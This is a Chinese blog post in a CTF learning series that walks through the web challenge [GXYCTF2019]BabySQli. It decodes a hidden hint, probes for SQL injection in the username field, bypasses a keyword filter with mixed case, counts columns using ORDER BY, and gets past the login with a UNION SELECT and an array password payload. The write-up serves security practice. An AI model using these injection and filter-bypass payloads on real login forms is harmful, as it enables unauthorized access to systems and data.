web18([GXYCTF2019]BabySQli):
1.CTF学习(2):Misc(你竟然赶我走)2.CTF学习( 3):Misc(二维码)3.CTF学习( 4):Misc(大白)4.CTF学习(5):Misc(乌镇峰会种图)5.CTF学习(6):Misc(wireshark)6.CTF学习(7):Misc(N种方法解决)7.CTF学习(8):Misc(基础破解)8.CTF学习(9):Misc(zip伪加密)9.CTF学习(10):Misc(LSB)10.CTF学习(11):Misc(被嗅探的流量)11.CTF学习(12):Misc(爱因斯坦)12.CTF学习:WEB(小合集)13.CTF学习(13)MISC(另一个世界)14.CTF学习(14)MISC(数据包中的线索)15.CTF学习(14)MISC(神秘龙卷风)16.CTF学习(15)MISC(FLAG)17.CTF学习(16)MISC(假如给我三天光明)18.CTF学习(17)MISC(后门查杀/webshell后门)19.web16:[GXYCTF2019]BabyUpload20.web17([SUCTF 2019]CheckIn):21.CTF学习(18)MISC(来首歌吧)22.CTF学习(19)MISC(面具下的flag)23.CTF学习(20)MISC(荷兰宽带数据泄露)24.CTF学习(21)MISC(九连环)25.CTF学习(22)MISC([BJDCTF2020]认真你就输)26.CTF学习(23)MISC(被劫持的神秘礼物)
27.web18([GXYCTF2019]BabySQli):
28.web19([GYCTF2020]Blacklist):29.web20([极客大挑战 2019]LoveSQL):1.打开BP抓包发现存在提示
提示:
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
经过Base16-32-64-91混合多重解码后:
select * from user where username = '$name'
(注入点是name
,这是在提示我表名和列名吧)
2.开始注入
在password处依次输入1
、1'
、1''
无果,发现在username处输入admin'回显语法错误(单引号getdaze)
多次注入后发现or
、oorr
、order by
都被过滤了
构造payload(使用大写order的O绕过):依次尝试了
name=admin' Order by 5#&pw=1
#回显:Error: Unknown column '5' in 'order clause'
name=admin' Order by 1#&pw=1
#回显:wrong pass!
name=admin' Order by 3#&pw=1
#回显:wrong pass!
name=admin' Order by 4#&pw=1
#回显:Error: Unknown column '4' in 'order clause'
最终得知一共有3列
瞎注了半小时破防,查看源代码发现要使得第二列的值admin,第三列的值等于md5加密后的pw的值
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
构造payload(md5不能识别数组,所以将第三列设为NULL
):
name=a' union select 1,'admin',NULL#&pw[]=123
获得flag
FLAG:flag{ae29c1af-c39e-40b1-97b9-907087edd267}
合集:
CTF学习
分类:
CTF学习(WEB)
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析